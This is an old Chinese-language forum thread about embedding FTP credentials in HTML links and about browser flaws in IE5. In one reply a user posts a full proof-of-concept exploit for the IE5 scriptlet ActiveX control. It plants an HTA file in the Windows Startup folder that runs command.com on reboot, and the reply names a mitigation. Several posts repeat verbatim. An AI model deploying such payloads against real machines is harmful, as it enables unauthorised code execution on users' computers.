H
herald
Unregistered / Unconfirmed
GUEST, unregistred user!
我再网站上有一个ftp站点,但是不是那种可以匿名访问的站点,我想要在主页中写一段代码,中间加入用户名河口令,用户点击后就可以下载的HTML代码,请问怎么写?
C
cAkk
Unregistered / Unconfirmed
GUEST, unregistred user!
URL这样写:
ftp://username
assword@xxx.com
//BTW:难道你没有听说IE5最新的那个漏洞? 就是这个.
ftp://username
assword@xxx.com//BTW:难道你没有听说IE5最新的那个漏洞? 就是这个.
J
jet
Unregistered / Unconfirmed
GUEST, unregistred user!
url如下:
设username为用户名,password为密码,ftp站点名称为ftp.test.com
http://usernameassword@ftp.test.com 即可。
如: http://foo:bar@ftp.test.com/pub/test.zip
设username为用户名,password为密码,ftp站点名称为ftp.test.com
http://username
assword@ftp.test.com 即可。如: http://foo:bar@ftp.test.com/pub/test.zip
J
jet
Unregistered / Unconfirmed
GUEST, unregistred user!
这好象不是漏洞吧,早就有了。
漏洞如下:
在Win9x下(不知道在NT下的情况),IE5可以利用生成或者覆盖本地文件的方法来执行本地计算机中的任意程序,这个问题出在ActiveX Control "Object for Constructing type libraries for scriptlets"。它允许生成和覆盖本地文件,或者在任意文件中增加更多的一些内容。那么一段利用了这个漏洞的HTML就可以写入一个HTML Application File(*.hta)到开始菜单里面“程序”中的“启动”,当用户再次启动机器(或者被强迫重启),那么这个HTML Application文件就会被执行。这个漏洞可以通过E-mail来执行。
这里提供一个示范的地址:http://www.nat.bg/~joro/scrtlb.html
代码如下:
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C://windows//Start Menu//Programs//StartUp//guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written
by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c://command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
解决方法:
把ActiveX scripting关掉,或者不使用ActiveX control及其插件。
漏洞如下:
在Win9x下(不知道在NT下的情况),IE5可以利用生成或者覆盖本地文件的方法来执行本地计算机中的任意程序,这个问题出在ActiveX Control "Object for Constructing type libraries for scriptlets"。它允许生成和覆盖本地文件,或者在任意文件中增加更多的一些内容。那么一段利用了这个漏洞的HTML就可以写入一个HTML Application File(*.hta)到开始菜单里面“程序”中的“启动”,当用户再次启动机器(或者被强迫重启),那么这个HTML Application文件就会被执行。这个漏洞可以通过E-mail来执行。
这里提供一个示范的地址:http://www.nat.bg/~joro/scrtlb.html
代码如下:
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C://windows//Start Menu//Programs//StartUp//guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written
by Georgi Guninski
http://www.nat.bg/~joro');wsh.Run('c://command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
解决方法:
把ActiveX scripting关掉,或者不使用ActiveX control及其插件。
C
cAkk
Unregistered / Unconfirmed
GUEST, unregistred user!
to jet: 看来你也不知道.
是这样的,用IE5访问一个非匿名的ftp站点时,会在状态栏显示如下信息:
ftp://usernameassword@xxx.com/xxx.zip
你的用户名和口令一目了然,如果你正在下在一个大的文件,很可能会有
充足时间被别人看见你的口令.
这个漏洞前段时间闹得沸沸扬扬,你居然不知道?
是这样的,用IE5访问一个非匿名的ftp站点时,会在状态栏显示如下信息:
ftp://username
assword@xxx.com/xxx.zip你的用户名和口令一目了然,如果你正在下在一个大的文件,很可能会有
充足时间被别人看见你的口令.
这个漏洞前段时间闹得沸沸扬扬,你居然不知道?
J
jet
Unregistered / Unconfirmed
GUEST, unregistred user!
xixi,不光在ie5中有,我在ie4和netscape中也遇到过!
不过这不是ie5的最新漏洞,我贴的哪个才是最新的,呵呵。
我一般都是打 http://admin@xxx.com 提示输入密码后再打密码。
netscape中没事,ie5中一开始也没事,一换目录就玩完:<
下载完后还要清空历史记录,麻烦啊!
不过这不是ie5的最新漏洞,我贴的哪个才是最新的,呵呵。
我一般都是打 http://admin@xxx.com 提示输入密码后再打密码。
netscape中没事,ie5中一开始也没事,一换目录就玩完:<
下载完后还要清空历史记录,麻烦啊!
C
cytown
Unregistered / Unconfirmed
GUEST, unregistred user!
可以这样:
&lt;form>
&lt;input name=user>
&lt;input name=pass type=password>
&lt;input type=button onclick="window.open('ftp://'+this.form.user.value+':'+this.form.pass.value+'@test.com','_top')">
&lt;/form>
&lt;form>
&lt;input name=user>
&lt;input name=pass type=password>
&lt;input type=button onclick="window.open('ftp://'+this.form.user.value+':'+this.form.pass.value+'@test.com','_top')">
&lt;/form>
H
herald
Unregistered / Unconfirmed
GUEST, unregistred user!
多人接受答案了。